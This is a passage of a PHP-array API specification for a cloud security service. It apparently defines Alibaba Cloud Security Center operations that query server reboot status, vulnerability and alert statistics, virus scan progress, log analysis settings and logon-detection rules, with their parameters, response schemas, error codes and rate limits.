Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese.', 'type' => 'string', 'example' => '5BD95679-D63A-4151-97D0-188432F4A57', 'title' => ''], 'RebootStatuses' => [ 'description' => 'The list of instance restart statuses.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => '9b59c2d6-0967-46e3-ad7b-152227c****', 'title' => ''], 'RebootStatus' => ['description' => 'The restart status of the server. Valid values:'."\n" .'- **0**: Restarting.'."\n" .'- **1**: Restarted.'."\n" .'- **2**: Restart failed.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'Code' => ['description' => 'The fault code returned when the instance fails to restart. Valid values:'."\n" ."\n" .'- **10001**: Failed to deliver the command.'."\n" .'- **10002**: Restart failed.'."\n" .'- **10003**: Timeout.', 'type' => 'string', 'example' => '10001', 'title' => ''], 'Msg' => ['description' => 'The exception information about the restart.', 'type' => 'string', 'example' => 'push failed', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query instance restart status', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeInstanceRebootStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeInstanceRebootStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"TotalCount\\": 100,\\n \\"RequestId\\": \\"5BD95679-D63A-4151-97D0-188432F4A57\\",\\n \\"RebootStatuses\\": [\\n {\\n \\"Uuid\\": \\"9b59c2d6-0967-46e3-ad7b-152227c****\\",\\n \\"RebootStatus\\": 2,\\n \\"Code\\": \\"10001\\",\\n \\"Msg\\": \\"push failed\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeInstanceStatistics' => [ 'summary' => 'Queries the statistics information of server asset instances.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92124', 'abilityTreeNodes' => ['FEATUREsasON13NY'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type of the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUIDs of the assets that you want to query. Separate multiple UUIDs with commas (,).'."\n" .'You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain the UUIDs of asset instances.', 'type' => 'string', 'required' => true, 'example' => '6690a46c-0edb-4663-a641-3629d1a9****', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The source of the request. Set the value to **sas**, which indicates that the request is sent from Security Center.', 'type' => 'string', 'required' => true, 'example' => 'sas', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '8F035A9D-D19F-5430-8CA5-1497991B7C61', 'title' => ''], 'Data' => [ 'description' => 'The statistics information of asset risks.', 'type' => 'array', 'items' => [ 'description' => 'The statistics information of asset risks.', 'type' => 'object', 'properties' => [ 'Account' => ['description' => 'The number of unusual logon events on the asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'AppNum' => ['description' => 'The number of application vulnerabilities on the asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ScaNum' => ['description' => 'The number of middleware vulnerabilities on the asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Trojan' => ['description' => 'The number of trojans detected on the asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'CveNum' => ['description' => 'The number of common vulnerabilities on the asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'EmgNum' => ['description' => 'The number of urgent vulnerabilities on the asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '6', 'title' => ''], 'CmsNum' => ['description' => 'The number of Web-CMS vulnerabilities on the asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the asset instance.', 'type' => 'string', 'example' => '6690a46c-0edb-4663-a641-3629d1a9****', 'title' => ''], 'Vul' => ['description' => 'The total number of vulnerabilities on the asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '17', 'title' => ''], 'Health' => ['description' => 'The number of baseline risk issues on the asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'SysNum' => ['description' => 'The number of Windows system vulnerabilities on the asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'WeakPWNum' => ['description' => 'The number of weak passwords.', 'type' => 'integer', 'format' => 'int32', 'example' => '22', 'title' => ''], 'AgentlessAll' => ['description' => 'The number of security alerts detected by agentless detection.', 'type' => 'integer', 'format' => 'int32', 'example' => '13', 'title' => ''], 'AgentlessMalicious' => ['description' => 'The number of malicious samples detected by agentless detection.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'AgentlessVulCve' => ['description' => 'The number of system vulnerabilities detected by agentless detection.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AgentlessVulSca' => ['description' => 'The number of application vulnerabilities detected by agentless detection.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AgentlessBaseline' => ['description' => 'The number of baseline issues detected by agentless detection.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'CspmNum' => ['description' => 'The number of Cloud Security Posture Management (CSPM) risk issues on the asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AgentlessVulSys' => ['description' => 'The number of Windows system vulnerabilities detected by agentless detection.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AgentlessSensitiveFile' => ['description' => 'The number of sensitive file alerts detected by agentless detection.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Suspicious' => ['description' => 'The number of security alerts on the asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'RemindSuspiciousNum' => ['description' => 'The number of reminder-level security alerts on the asset.', 'type' => 'string', 'example' => '1', 'title' => ''], 'SuspectSuspiciousNum' => ['description' => 'The number of suspicious security alerts on the asset.', 'type' => 'string', 'example' => '1', 'title' => ''], 'SeriousSuspiciousNum' => ['description' => 'The number of high-risk security alerts on the asset.', 'type' => 'string', 'example' => '2', 'title' => ''], 'SysAsapVulCount' => ['description' => 'The number of system vulnerabilities on the asset.', 'type' => 'string', 'example' => '1', 'title' => ''], 'CspmHighRiskNum' => ['description' => 'The number of high-risk CSPM issues on the system.', 'type' => 'string', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query server statistics information', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeInstanceStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeInstanceStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"8F035A9D-D19F-5430-8CA5-1497991B7C61\\",\\n \\"Data\\": [\\n {\\n \\"Account\\": 0,\\n \\"AppNum\\": 1,\\n \\"ScaNum\\": 1,\\n \\"Trojan\\": 1,\\n \\"CveNum\\": 1,\\n \\"EmgNum\\": 6,\\n \\"CmsNum\\": 5,\\n \\"Uuid\\": \\"6690a46c-0edb-4663-a641-3629d1a9****\\",\\n \\"Vul\\": 17,\\n \\"Health\\": 2,\\n \\"SysNum\\": 3,\\n \\"WeakPWNum\\": 22,\\n \\"AgentlessAll\\": 13,\\n \\"AgentlessMalicious\\": 3,\\n \\"AgentlessVulCve\\": 1,\\n \\"AgentlessVulSca\\": 1,\\n \\"AgentlessBaseline\\": 2,\\n \\"CspmNum\\": 1,\\n \\"AgentlessVulSys\\": 1,\\n \\"AgentlessSensitiveFile\\": 1,\\n \\"Suspicious\\": 2,\\n \\"RemindSuspiciousNum\\": \\"1\\",\\n \\"SuspectSuspiciousNum\\": \\"1\\",\\n \\"SeriousSuspiciousNum\\": \\"2\\",\\n \\"SysAsapVulCount\\": \\"1\\",\\n \\"CspmHighRiskNum\\": \\"1\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeInstanceVulStatistics' => [ 'summary' => 'Queries vulnerability statistics for a cluster.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '194674', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], ], 'parameters' => [ [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the asset instance to query.'."\n" .'>You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => '5b268326-273e-44fc-a0e3-9482435c****', 'title' => ''], ], [ 'name' => 'Types', 'in' => 'query', 'schema' => ['description' => 'The vulnerability type of the Serverless asset. Valid values:'."\n" ."\n" .'- **sca**: middleware vulnerability'."\n" ."\n" .'- **app**: scanner vulnerability'."\n" ."\n" .'>Serverless assets currently support only application vulnerability scanning.', 'type' => 'string', 'required' => false, 'example' => 'sca,app', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '1EE7B150-D67E-53FD-A52D-3E8E669A****', 'title' => ''], 'VulStat' => [ 'description' => 'The vulnerability statistics information.', 'type' => 'object', 'properties' => [ 'AsapCount' => ['description' => 'The number of high-priority vulnerabilities.', 'type' => 'string', 'example' => '0', 'title' => ''], 'LaterCount' => ['description' => 'The number of medium-priority vulnerabilities.', 'type' => 'string', 'example' => '0', 'title' => ''], 'NntfCount' => ['description' => 'The number of low-priority vulnerabilities.', 'type' => 'string', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query vulnerability risk statistics for serverless asset instances', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeInstanceVulStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeInstanceVulStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1EE7B150-D67E-53FD-A52D-3E8E669A****\\",\\n \\"VulStat\\": {\\n \\"AsapCount\\": \\"0\\",\\n \\"LaterCount\\": \\"0\\",\\n \\"NntfCount\\": \\"0\\"\\n }\\n}","type":"json"}]', ], 'DescribeLatestScanTask' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'TargetInfo' => ['description' => 'The asset information scanned by the virus scan node. This parameter is expressed as a character string converted from a JSON array. The following fields are included:'."\n" .'- **type**: The Asset Type on which the virus scan is executed. Valid values:'."\n" .' - **groupId**: server group.'."\n" .' - **uuid**: server.'."\n" .'- **name**: The name of the server group or server.'."\n" .'- **target**: The asset on which the virus scan is executed. The following describes the values of this field:'."\n" .' - If **type** is set to **groupId**, this field specifies the server group ID.'."\n" .' - If **type** is set to **uuid**, this field specifies the UUID of the server.', 'type' => 'string', 'example' => '[{"type":"uuid","name":"Host001","target":"503201a7-14c6-4280-801b-1169ed42****"}]', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42XXXXXXXX', 'title' => ''], 'LastCheckTime' => ['description' => 'The timestamp of the most recent scan, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1671610264000', 'title' => ''], 'RiskNum' => ['description' => 'The number of virus risks detected on the server.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Uuids' => [ 'description' => 'The list of UUIDs of the assets.', 'type' => 'array', 'items' => ['description' => 'The UUID of the asset.', 'type' => 'string', 'example' => 'd77f7802-4f0a-4221-ab02-4d999e****', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query latest virus scan', 'summary' => 'Queries the progress of the most recent virus scan task.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeLatestScanTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeLatestScanTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"TargetInfo\\": \\"[{\\\\\\"type\\\\\\":\\\\\\"uuid\\\\\\",\\\\\\"name\\\\\\":\\\\\\"Host001\\\\\\",\\\\\\"target\\\\\\":\\\\\\"503201a7-14c6-4280-801b-1169ed42****\\\\\\"}]\\",\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42XXXXXXXX\\",\\n \\"LastCheckTime\\": 1671610264000,\\n \\"RiskNum\\": 1,\\n \\"Uuids\\": [\\n \\"d77f7802-4f0a-4221-ab02-4d999e****\\"\\n ]\\n}","type":"json"}]', ], 'DescribeLogMeta' => [ 'summary' => 'Queries the configuration information of log analysis in Security Center.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '154029', 'abilityTreeNodes' => ['FEATUREsasA2G5MU'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '123.168.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The source identifier of the request. Default value: **aegis**. Valid values:'."\n" ."\n" .'- **aegis**: Server Guard edition.'."\n" .'- **sas**: Security Center edition.'."\n" ."\n" .'> Server Guard users should use **aegis**, and Security Center users should use **sas**.', 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The ID of the member accounts in the resource directory (Alibaba Cloud account).'."\n" .'>You can invoke the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '127608589417****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The total number of configuration entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'RequestId' => ['description' => 'The request ID. It is a unique identifier generated by Alibaba Cloud for the request and can be used for troubleshooting.', 'type' => 'string', 'example' => 'D0D6E6E4-CB8C-4897-B852-46AEFDA04B21', 'title' => ''], 'LogMetaList' => [ 'description' => 'The list of log analysis configurations in Security Center.', 'type' => 'array', 'items' => [ 'description' => 'The log analysis configuration information in Security Center.', 'type' => 'object', 'properties' => [ 'LogDesc' => ['description' => 'The name of the log type.', 'type' => 'string', 'example' => 'Login', 'title' => ''], 'Status' => ['description' => 'The current status. Valid values:'."\n" .'- **disabled**: Disabled.'."\n" .'- **enabled**: Enabled.', 'type' => 'string', 'example' => 'enabled', 'title' => ''], 'LogStore' => ['description' => 'The name of the dedicated Logstore where logs are stored.', 'type' => 'string', 'example' => 'aegis-log-login', 'title' => ''], 'UserProject' => ['description' => 'The name of the dedicated Project where logs are stored.', 'type' => 'string', 'example' => 'sasnew-log-XXXX-cn-hangzhou', 'title' => ''], 'Category' => ['description' => 'The log category. Valid values:'."\n" ."\n" .'- **host**: Host logs.'."\n" .'- **security**: Security logs.', 'type' => 'string', 'example' => 'host', 'title' => ''], 'Project' => ['description' => 'The Project name.', 'type' => 'string', 'example' => 'aegis-log', 'title' => ''], 'UserLogStore' => ['description' => 'The name of the dedicated Logstore where user logs are stored.', 'type' => 'string', 'example' => 'aegis-log-network', 'title' => ''], 'UserRegion' => ['description' => 'The region to which the logs belong.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'Ttl' => ['description' => 'The log retention period, in days.', 'type' => 'integer', 'format' => 'int32', 'example' => '180', 'title' => ''], 'HotTtl' => ['description' => 'The number of days before hot storage data is converted to cold storage. Unit: days.'."\n" ."\n\n" .'> A value of **-1** indicates that no conversion is performed.', 'type' => 'integer', 'format' => 'int32', 'example' => '-1', 'title' => ''], 'Topic' => ['description' => 'The topic of the delivered logs.', 'type' => 'string', 'example' => 'aegis-log-login', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ['errorCode' => 'ThrottlingUser', 'errorMessage' => 'Request was denied due to user flow control.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Query security center log analysis configuration', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeLogMeta'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeLogMeta', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"TotalCount\\": 100,\\n \\"RequestId\\": \\"D0D6E6E4-CB8C-4897-B852-46AEFDA04B21\\",\\n \\"LogMetaList\\": [\\n {\\n \\"LogDesc\\": \\"Login\\",\\n \\"Status\\": \\"enabled\\",\\n \\"LogStore\\": \\"aegis-log-login\\",\\n \\"UserProject\\": \\"sasnew-log-XXXX-cn-hangzhou\\",\\n \\"Category\\": \\"host\\",\\n \\"Project\\": \\"aegis-log\\",\\n \\"UserLogStore\\": \\"aegis-log-network\\",\\n \\"UserRegion\\": \\"cn-hangzhou\\",\\n \\"Ttl\\": 180,\\n \\"HotTtl\\": -1,\\n \\"Topic\\": \\"aegis-log-login\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeLogShipperStatus' => [ 'summary' => 'Queries the availability status of the log analysis feature.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92136', 'abilityTreeNodes' => ['FEATUREsasA2G5MU'], ], 'parameters' => [ [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The request source identifier. Set this parameter to **sas**.', 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response object.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '24A20733-10A0-4AF6-BE6B-E3322413****', 'title' => ''], 'LogShipperStatus' => [ 'description' => 'The log delivery status collection.', 'type' => 'object', 'properties' => [ 'OpenStatus' => ['description' => 'The enabling status of log analysis. Valid values:'."\n" ."\n" .'- **yes**: enabled'."\n" .'- **no**: not enabled.', 'type' => 'string', 'example' => 'yes', 'title' => ''], 'SlsServiceStatus' => ['description' => 'The activation status of Simple Log Service (SLS). Valid values:'."\n" ."\n" .'- **yes**: activated'."\n" .'- **no**: not activated.', 'type' => 'string', 'example' => 'yes', 'title' => ''], 'AuthStatus' => ['description' => 'The service authorization status of the log analysis feature. Valid values:'."\n" ."\n" .'- **yes**: authorized'."\n" .'- **no**: not authorized.', 'type' => 'string', 'example' => 'yes', 'title' => ''], 'BuyStatus' => ['description' => 'The purchase status of the log analysis feature. Valid values:'."\n" ."\n" .'- **yes**: purchased'."\n" .'- **no**: not purchased.', 'type' => 'string', 'example' => 'yes', 'title' => ''], 'PostPaidSupportStatus' => ['description' => 'The pay-as-you-go support status of the log analysis feature. Valid values:'."\n" ."\n" .'- **yes**: supported'."\n" .'- **no**: not supported.', 'type' => 'string', 'example' => 'yes', 'title' => ''], 'PostPaidOpenStatus' => [ 'description' => 'The pay-as-you-go activation status of the log analysis feature. Valid values:'."\n" ."\n" .'- **yes**: activated'."\n" .'- **no**: not activated.', 'enumValueTitles' => [], 'type' => 'string', 'example' => 'no', 'title' => '', ], 'SlsProjectStatus' => [ 'description' => 'The status of the log project used by the log analysis feature. Valid values:'."\n" ."\n" .'- **Normal**: Normal.'."\n" .'- **Disable**: Disabled.', 'enumValueTitles' => ['normal' => 'Normal.', 'training' => 'Training.'], 'type' => 'string', 'example' => 'Normal', 'title' => '', ], 'EtlMetaVersion' => ['description' => 'The version of the log delivery fields for log analysis. Valid values:'."\n" ."\n" .'- **SAS_V1**'."\n" .'- **SAS_V2**.', 'type' => 'string', 'example' => 'SAS_V1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query log analysis feature status', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeLogShipperStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeLogShipperStatus', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'LogShipper', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:logshipper/*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"24A20733-10A0-4AF6-BE6B-E3322413****\\",\\n \\"LogShipperStatus\\": {\\n \\"OpenStatus\\": \\"yes\\",\\n \\"SlsServiceStatus\\": \\"yes\\",\\n \\"AuthStatus\\": \\"yes\\",\\n \\"BuyStatus\\": \\"yes\\",\\n \\"PostPaidSupportStatus\\": \\"yes\\",\\n \\"PostPaidOpenStatus\\": \\"no\\",\\n \\"SlsProjectStatus\\": \\"Normal\\",\\n \\"EtlMetaVersion\\": \\"SAS_V1\\"\\n }\\n}","type":"json"}]', ], 'DescribeLoginBaseConfigs' => [ 'summary' => 'Queries the configuration of unusual logon detection rules for servers.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas731ZAS'], ], 'parameters' => [ [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'Settings for paged query. The number of logon configuration entries to display on each page when paging is used. Default value: **5**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '5', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of logon configuration to query. Valid values:'."\n" .'- **login\\_common_location**: common logon location.'."\n" .'- **login\\_common_ip**: common logon IP address.'."\n" .'- **login\\_common_time**: common logon time.'."\n" .'- **login\\_common_account**: common logon account.', 'type' => 'string', 'required' => true, 'example' => 'login_common_location', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Target', 'in' => 'query', 'schema' => ['description' => 'The selection mode for the assets on which the policy takes effect. This parameter is in JSON format and contains the following fields:'."\n" ."\n" .'- **Target**: The UUID of the server to add or delete, or the ID of the server group.'."\n" ."\n" .'> If the targetType parameter is set to uuid, this parameter specifies the UUID of the server. If the targetType parameter is set to groupId, this parameter specifies the ID of the server group. If the targetType parameter is set to global, set this parameter to a hyphen (-).'."\n" ."\n" .'- **targetType**: The selection mode for the assets on which the policy takes effect. Valid values:'."\n" .' - **uuid**: queries by individual server.'."\n" .' - **groupId**: queries by server group.'."\n" .' - **global**: queries all servers.', 'type' => 'string', 'required' => false, 'example' => '[ {"target": "inet-7c676676-06fa-442e-90fb-b802e5d6****", "targetType": "uuid" } ]', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response data of the unusual logon detection rule configuration.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The current page number in the paging query result.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '2C2D4B3C-0524-17B1-93D2-DA50119F4E1E', 'title' => ''], 'PageSize' => ['description' => 'The number of logon configuration entries displayed on each page in the paging query result. Default value: **20**.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of logon configuration entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'BaseConfigs' => [ 'description' => 'The list of logon configuration details.', 'type' => 'array', 'items' => 